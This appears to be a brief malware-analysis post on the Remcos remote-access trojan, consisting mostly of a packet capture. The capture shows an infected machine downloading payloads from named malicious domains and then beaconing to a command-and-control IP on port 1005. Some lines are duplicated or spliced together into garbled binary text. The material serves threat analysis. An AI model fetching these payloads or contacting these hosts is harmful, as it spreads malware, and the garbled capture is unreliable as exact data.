Remcos is a RAT type malware which means that attackers use it to perform actions on infected machines remotely. This malware is extremely actively caped up to date with updates coming out almost every single month.

2020-02-08 21:12:20.981585 IP 192.168.86.25.56271 > 46.4.22.188.80: Flags [P.], seq 2260857165:2260857557, ack 24046668, win 16425, length 392: HTTP: GET /a/a.exe HTTP/1.1
E…..@…….V……..P…M.n.LP.@)*…GET /a/a.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ntaryan.com
Connection: Keep-Alive

2020-02-08 21:12:21.096476 IP 46.4.22.188.80 > 192.168.86.25.56271: Flags [P.], seq 1:1370, ack 392, win 123, length 1369: HTTP: HTTP/1.1 301 Moved Permanently
E…..@.2………V..P…n.L….P..{._..HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 1147
Date: Sun, 09 Feb 2020 02:13:09 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Location: https://ntaryan.com/a/a.exe
Connection: Keep-Alive

301 Moved Permanently

301

Moved Permanently

The document has been permanently moved.
Proudly powered by LiteSpeed Web Server

Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.

2020-02-08 21:12:29.915772 IP 192.168.86.25.56272 > 198.96.95.42.80: Flags [P.], seq 980367087:980367245, ack 2427136781, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1
E…..@…….V..`_*…P:o6…+.P.@):|..GET /a/a.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: arabianbrother.com
Cache-Control: no-cache

2020-02-08 21:12:29.973133 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 1:232, ack 158, win 237, length 231: HTTP: HTTP/1.1 200 OK
E…g.@.+….`_*..V..P….+.:o7.P…G…HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/octet-stream
Last-Modified: Sat, 08 Feb 2020 09:06:17 GMT
Accept-Ranges: bytes
Content-Length: 127040
Date: Sun, 09 Feb 2020 02:13:18 GMT
Server: LiteSpeed

2020-02-08 21:12:29.915772 IP 192.168.86.25.56272 > 198.96.95.42.80: Flags [P.], seq 980367087:980367245, ack 2427136781, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1
E…..@…….V..`_*…P:o6…+.P.@):|..GET /a/a.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: arabianbrother.com
Cache-Control: no-cache

2020-02-08 21:12:29.973133 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 1:232, ack 158, win 237, length 231: HTTP: HTTP/1.1 200 OK
E…g.@.+….`_*..V..P….+.:o7.P…G…HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/octet-stream
Last-Modified: Sat, 08 Feb 2020 09:06:17 GMT
Accept-Ranges: bytes
Content-Length: 127040
Date: Sun, 09 Feb 2020 02:13:18 GMT
Server: LiteSpeed

2020-02-08 21:12:30.160111 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 103892:105352, ack 158, win 237, length 1460: HTTP
E…h.@.+…._*..V..P......:o7.P....H....eA... ...$...L.@:.i.y.......c.H!.G..N.?..+4.8RzF... "...n......l..D..[..C2....#M..v...^...S.p Ur_..5[b...|.&E...3.../..*{..K.'.y...;.h9.P..,..t..f.a./k0$.Q.q….=B…V…w…..mog.6.7.P.XjxO.X…T…..}>…-s.n(<..uW…~…:J…2cI.’..E)…….d..]Y…..eA… …$…L.@:.i.y…….c.H!.G..N.?..+4.8RzF… “…n……l..D..[..C2….#M.’..E)…….d..]Y…..eA… …$…L.@:.i.y…….c.H!.G..N.?..+4.8RzF… “…n……l..D..[..C2….#M..v…^…S.p Ur_..5[b…|.&E…3…/..{..K.’.y…;.h9.P..,..t..f.a./k0$.Q.q....=B...V...w.....mog.6.7.P.XjxO.X...T..\...}>...-s.n(<..uW...~...:J...2cI.'..E).......d..]Y.....eA... ...$...L.@:.i.y.......c.H!.G..N.?..+4.8RzF... "...n......l..D..[..C2....#M..v...^...S.p Ur_..5[b...|.&E...3.../..*{..K.'.y...;.h9.P..,..t..f.a./k0$.Q.q….=B…V…w…..mog.6.7.P.XjxO.X…T…..}>…-s.n(<..uW…~…:J…2cI.’..E)…….d..]Y…..eA… …$…L.@:.i.y…….c.H!.G..N.?..+4.8RzF… “…n……l..D..[..C2….#M.’..E)…….d..]Y…..eA… …$…L.@:.i.y…….c.H!.G..N.?..+4.8RzF… “…n……l..D..[..C2….#M..v…^…S.p Ur_..5[b…|.&E…3…/..{..K.’.y…;.h9.P..,..t..f.a./k0$.Q.q....=B...V...w.....mog.6.7.P.XjxO.X...T..\...}>...-s.n(<..uW...~...:J...2cI.'..E).......d..]Y.....eA... ...$...L.@:.i.y.......c.H!.G..N.?..+4.8RzF... "...n......l..D..[..C2....#M..v...^...S.p Ur_..5[b...|.&E...3.../..*{..K.'.y...;.h9.P..,..t..f.a./k0$.Q.q….=B…V…w…..mog.6.7.P.XjxO.X…T…..}>…-s.n(<..uW…~…:J. 2020-02-08 21:12:30.161350 IP 198.96.95.42.80 > 192.168.86.25.56272: Flags [P.], seq 127252:127272, ack 158, win 237, length 20: HTTP
E..<h.@.+..]._*..V..P..... :o7.P.........d..]Y.....eA... .. 2020-02-08 21:12:33.822577 IP 192.168.86.25.56273 > 198.96.95.42.80: Flags [P.], seq 3026874668:3026874826, ack 2251535379, win 16425, length 158: HTTP: GET /a/a.bin HTTP/1.1 E....'@.......V.._*…P.jq,.3..P.@)….GET /a/a.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: arabianbrother.com
Cache-Control: no-cache

2020-02-08 21:13:15.419664 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 209:235, ack 2299, win 65, length 26
E..B1K@.s…[.K…V…..>(=…EMP..A……..]….0……..n….#3.
2020-02-08 21:13:15.420766 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2299:2492, ack 235, win 16554, length 193
E…..@…3…V.[.K…….EM>(=.P.@.t-……]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^ 192.168.86.25.56274: Flags [P.], seq 235:261, ack 2492, win 64, length 26
E..B1M@.s…[.K…V…..>(=…F.P..@……..]….0……..n….#3.
2020-02-08 21:13:20.429820 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2492:2686, ack 261, win 16548, length 194
E…..@…3…V.[.K…….F.>(=.P.@………]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^ 192.168.86.25.56274: Flags [P.], seq 261:287, ack 2686, win 63, length 26
E..B1O@.s…[.K…V…..>(=…F.P..?……..]….0……..n….#3.
2020-02-08 21:13:25.445454 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2686:2880, ack 287, win 16541, length 194
E…..@…3…V.[.K…….F.>(=.P.@………]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^ 192.168.86.25.56274: Flags [P.], seq 287:313, ack 2880, win 63, length 26
E..B1Q@.s…[.K…V…..>(=…G.P..?.’……]….0……..n….#3.
2020-02-08 21:13:30.461804 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2880:3074, ack 313, win 16535, length 194
E…..@…3…V.[.K…….G.>(=.P.@..3……]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^..xqc….:V…{.
2020-02-08 21:13:30.980975 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 287:313, ack 2880, win 63, length 26
E..B1R@.s…[.K…V…..>(=…G.P..?.’……]….0……..n….#3.
2020-02-08 21:13:31.167560 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 2880:3074, ack 313, win 16535, length 194
E…..@…3…V.[.K…….G.>(=.P.@..3……]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^..xqc….:V…{.
2020-02-08 21:13:35.474537 IP 91.193.75.248.1005 > 192.168.86.25.56274: Flags [P.], seq 313:339, ack 3074, win 62, length 26
E..B1U@.s…[.K…V…..>(=…HTP..>.L……]….0……..n….#3.
2020-02-08 21:13:35.475164 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 3074:3268, ack 339, win 16528, length 194
E…..@…3…V.[.K…….HT>(>.P.@..V……]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(…Pex…..En.t..>.8..$3…..c,.l
I^ 192.168.86.25.56274: Flags [P.], seq 339:365, ack 3268, win 61, length 26
E..B1W@.s…[.K…V…..>(>…I.P..=.q……]….0……..n….#3.
2020-02-08 21:13:40.549500 IP 192.168.86.25.56274 > 91.193.75.248.1005: Flags [P.], seq 3268:3462, ack 365, win 16522, length 194
E…..@…3…V.[.K…….I.>(>*P.@..z……]….0……..n….#3…S..c…d.d.u6<.?r7..w..J.oiC..u….K.z.3.V…0.tb].5..Go&..jC….Pa&..E}.sV(

Please follow and like us: